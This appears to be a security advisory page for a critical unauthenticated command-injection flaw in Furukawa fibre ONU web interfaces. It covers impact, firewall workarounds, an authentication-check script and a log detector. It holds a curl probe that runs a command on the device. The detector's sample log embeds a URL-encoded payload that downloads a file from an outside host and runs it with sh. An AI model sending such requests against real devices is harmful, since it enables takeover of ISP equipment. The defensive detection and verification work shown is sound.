CVE-2021-37384

9.8 CRITICAL

📋 TL;DR

CVE-2021-37384 is a critical remote code execution vulnerability affecting certain Furukawa ONU (Optical Network Unit) models. An unauthenticated attacker who can reach the device's web management interface can execute arbitrary commands on it and take full control. ISPs that deploy vulnerable Furukawa ONUs, and the subscribers behind those devices, are affected.

💻 Affected Systems

Products:
  • Furukawa ONU models (the exact model list is not fully documented in public sources)
Versions: Not pinned down in public sources; appears to affect multiple models
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability is in the web management interface. Default configurations appear vulnerable because the affected endpoint requires no authentication, so any host that can reach the interface can exploit it.

📦 What is this software?

An ONU is the subscriber-side terminal of a passive optical network (GPON/EPON): it terminates the fibre from the operator's OLT and presents Ethernet (and, on home-gateway models, Wi-Fi and VoIP) to the customer. The operator normally provisions it remotely from the OLT, but most ONUs, including Furukawa's, also run a local web management interface on the device itself. That interface is the attack surface here.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete device compromise, allowing attackers to execute arbitrary code, steal credentials, pivot into the networks the ONU bridges, disrupt service, or deploy persistent malware.

🟠 Likely Case: Attackers gain administrative access to the ONU, modify its configuration, intercept or redirect subscriber traffic, or disrupt internet connectivity for the users behind it.

🟢 If Mitigated: With the management interface reachable only from a trusted management network and the ONU segmented from other systems, an attacker first needs a foothold on that network, and a compromised ONU cannot be used for lateral movement.

🌐 Internet-Facing: HIGH - An ONU whose web interface is exposed on the WAN side can be exploited from anywhere on the internet without credentials.
🏢 Internal Only: HIGH - Because no authentication is needed, any host that can reach the management interface (including a compromised subscriber device on the LAN side) can exploit it.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit details and proof-of-concept code are available. The attack needs no authentication and consists of ordinary HTTP requests to the web interface, so it is easy to script and to scan for at scale.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not publicly available

Restart Required: No

Instructions:

No official patch or vendor advisory has been publicly released. Contact Furukawa directly for a fixed firmware build, and apply the workarounds below in the meantime.

🔧 Temporary Workarounds

Network Segmentation (platform: all)

Isolate the ONU management interface from untrusted networks: it should be reachable only from a dedicated management network, never from the WAN side or from subscriber LAN segments.

Access Control Lists (platform: linux)

Restrict access to the ONU web interface to trusted management IPs only. The rules below are written for a Linux host that owns the web interface (INPUT chain). ONU firmware typically gives you no shell, so in practice they belong on the upstream Linux gateway or firewall, where the traffic transits rather than terminates: use the FORWARD chain there and add -d <onu_ip> to each rule.

# Replace trusted_ip with the management host or subnet, e.g. 10.0.0.0/24.
# Order matters: the ACCEPT rules must precede the DROP rules, and -A appends,
# so confirm with "iptables -L INPUT -n --line-numbers" that no earlier rule
# already accepts this traffic.
iptables -A INPUT -p tcp --dport 80 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

  • Disable the web management interface if it is not required for operations (remote provisioning from the OLT usually does not depend on it)
  • Implement strict network segmentation so the ONU's management interface is not reachable from the internet, from subscriber LANs, or from any other untrusted network

🔍 How to Verify

Check if Vulnerable:

Send the command-injection probe from the public PoC to the device and look for command output in the response. The form below is this page's illustrative example; replace the path and parameter with the ones from the PoC you are working from:

curl -X POST 'http://<onu_ip>/cgi-bin/command.cgi' --data 'cmd=id'

A response containing id output such as uid=0(root) means the endpoint ran the command without authentication. This probe executes a command on the device, so run it only against hardware you are authorised to test.

Check Version:

Read the firmware version from the web interface's status or system page, or from the serial console, and compare it with whatever build Furukawa designates as fixed.

Verify Fix Applied:

Repeat the probe above: a fixed interface should answer an unauthenticated request with an authentication challenge or a redirect to the login page, and must never return command output.
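A lighter-weight way to do the "requires proper authentication" check is to ask only whether the CGI endpoint enforces authentication at all, without asking the device to run a command. The script below is an added example for this page, not a vendor tool and not the public PoC: it POSTs an empty body to the endpoint, refuses to follow redirects so that a bounce to a login page is visible, and classifies the response. The default path is the illustrative one used on this page and should be replaced with the one from the PoC; a "no-auth-enforced" result is a strong signal but not proof of command execution (the handler may simply ignore an empty request). Only point probe() at devices you are authorised to test.

```python
"""Check whether an ONU's CGI endpoint enforces authentication, without
asking the device to execute anything.

Added example, not from the original page, Furukawa, or the public PoC.
The endpoint path is an assumption taken from the page's illustrative
curl command; replace it with the real one.
"""
import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError instead of following them, so a
    redirect to a login page reaches classify_auth() intact."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify_auth(status, headers, body):
    """Classify one HTTP response to an unauthenticated POST.

    auth-required    : challenged (401/403), redirected to a login page, or
                       served a login form instead of the handler
    no-auth-enforced : HTTP 200 with non-login content; the unauthenticated
                       path is reachable (strong signal, not proof of RCE)
    inconclusive     : anything else (server errors, unrelated redirects)
    """
    h = {k.lower(): v for k, v in headers.items()}
    if status in (401, 403):
        return "auth-required"
    if 300 <= status < 400:
        return "auth-required" if "login" in h.get("location", "").lower() else "inconclusive"
    if status == 200:
        low = body.lower()
        if 'type="password"' in low or "type='password'" in low:
            return "auth-required"
        return "no-auth-enforced"
    return "inconclusive"


def probe(base_url, path="/cgi-bin/command.cgi", timeout=5):
    """POST an empty body to base_url + path and classify the response.
    Returns "unreachable" if the device does not answer at all."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(base_url.rstrip("/") + path, data=b"", method="POST")
    try:
        with opener.open(req, timeout=timeout) as resp:
            body = resp.read(4096).decode("utf-8", "replace")
            return classify_auth(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as err:
        # 3xx (via NoRedirect), 4xx and 5xx all land here with headers and body.
        body = err.read(4096).decode("utf-8", "replace")
        return classify_auth(err.code, dict(err.headers), body)
    except OSError:
        # Covers URLError and socket timeouts: nothing to classify.
        return "unreachable"


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.1"  # placeholder address
    print(probe(target))
```

Usage: python3 onu_authcheck.py http://<onu_ip>. Treat "no-auth-enforced" as "follow up with the PoC under authorisation", and "auth-required" as evidence the fix or the workaround is in place, not as proof of patch level on its own.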

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /cgi-bin/ endpoints on the ONU from hosts outside the management network
  • CGI requests that succeed (HTTP 200) with no preceding login and no session cookie, which is exactly what an unauthenticated exploit looks like
  • Shell metacharacters (;, |, backticks, $(, &&) or command names in request parameters

Network Indicators:

  • HTTP POST requests to the ONU web interface from unexpected sources, especially from the WAN side or from subscriber LAN segments
  • Request bodies or query strings carrying command-injection payloads, and outbound connections from the ONU to download or call back to attacker infrastructure right after such a request

SIEM Query:

source="web_logs" AND method="POST" AND url="/cgi-bin/*" AND status=200 AND NOT src_ip IN (<management_subnets>)

The original query OR-ed the URL and method conditions, which matches every POST on the device, and required a curl or python-requests User-Agent, which an attacker changes in one line. Keep the user agent as an enrichment field (user_agent="curl/*" OR user_agent="python-requests/*") to prioritise hits, not as a required condition.
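The log indicators above, applied to sample records, as an added example that is not part of the original page: a small detector that parses one JSON log line per request, URL-decodes the parameters so that %3B is inspected as the ";" the shell will see, and raises a finding for CGI POSTs that carry shell metacharacters, come from outside the management network, or are accepted without a session cookie. The log field names, the management subnet, the session-cookie name and the log lines themselves are all assumptions; most access logs do not record POST bodies, so the "body" field presumes body logging on a proxy in front of the ONU or extraction from a packet capture.

```python
"""Flag unauthenticated command-injection attempts against an ONU web interface.

Added example for this page, not code from Furukawa or from the advisory.
Assumes a proxy or gateway in front of the ONU writes one JSON object per
request with the fields used below; the "body" field is an assumption.
All sample log lines are constructed.
"""
import ipaddress
import json
import re
from typing import Optional
from urllib.parse import unquote_plus

# Assumed trusted management subnet; any other source is "untrusted".
MANAGEMENT_NETS = [ipaddress.ip_network("10.0.0.0/24")]
# Assumed name of the interface's session cookie.
SESSION_COOKIE = "sessionid="
# Characters that splice a second command into a shell invocation.
INJECTION_RE = re.compile(r"[;|`\n]|\$\(|&&")

# Constructed sample log: one JSON record per line.
SAMPLE_LOG = """\
{"src": "10.0.0.5", "method": "POST", "path": "/cgi-bin/config.cgi", "query": "", "body": "ssid=home", "cookie": "sessionid=abc123", "status": 200}
{"src": "203.0.113.7", "method": "POST", "path": "/cgi-bin/command.cgi", "query": "", "body": "cmd=id", "cookie": "", "status": 200}
{"src": "198.51.100.9", "method": "POST", "path": "/cgi-bin/ping.cgi", "query": "", "body": "host=127.0.0.1%3Bwget+http%3A%2F%2F198.51.100.9%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx", "cookie": "", "status": 200}
{"src": "203.0.113.8", "method": "GET", "path": "/cgi-bin/status.cgi", "query": "", "body": "", "cookie": "", "status": 200}
{"src": "10.0.0.5", "method": "POST", "path": "/cgi-bin/ping.cgi", "query": "", "body": "host=8.8.8.8", "cookie": "sessionid=abc123", "status": 200}
"""


def from_management(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MANAGEMENT_NETS)


def analyze(record: dict) -> Optional[dict]:
    """Return a finding for one parsed record, or None if it looks benign."""
    if record.get("method") != "POST" or not record.get("path", "").startswith("/cgi-bin/"):
        return None
    # Decode URL encoding so the parameters are inspected as the shell would see them.
    params = unquote_plus(record.get("body", "")) + "&" + unquote_plus(record.get("query", ""))
    injection = bool(INJECTION_RE.search(params))
    reasons = []
    if injection:
        reasons.append("shell metacharacters in request parameters")
    if not from_management(record.get("src", "0.0.0.0")):
        reasons.append("CGI POST from outside the management network")
    if record.get("status") == 200 and SESSION_COOKIE not in record.get("cookie", ""):
        reasons.append("accepted (HTTP 200) without a session cookie")
    if not reasons:
        return None
    # Metacharacters are the strongest signal; an unauthenticated CGI POST from an
    # untrusted source still deserves an alert even with a benign-looking body.
    return {
        "src": record["src"],
        "path": record["path"],
        "severity": "high" if injection else "medium",
        "reasons": reasons,
    }


def scan(log_text: str) -> list:
    """Run analyze() over every non-empty line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            finding = analyze(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['src']} -> {f['path']}: {'; '.join(f['reasons'])}")
```

On the constructed sample the first and last records (management host, valid session, clean parameters) produce nothing, the bare cmd=id from 203.0.113.7 is a medium finding (untrusted source, no session), and the ping.cgi request from 198.51.100.9 is high because of the ";wget ...;sh" chain hidden behind URL encoding.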

🔗 References
